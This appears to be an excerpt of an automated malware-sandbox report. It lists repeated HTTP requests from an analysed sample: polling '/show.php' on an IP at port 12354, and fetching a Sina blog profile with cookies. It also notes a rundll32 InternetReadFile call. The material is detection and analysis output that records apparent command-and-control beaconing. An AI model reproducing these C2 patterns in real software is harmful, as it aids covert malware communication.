Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004990 InternetReadFile,5_2_10004990
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
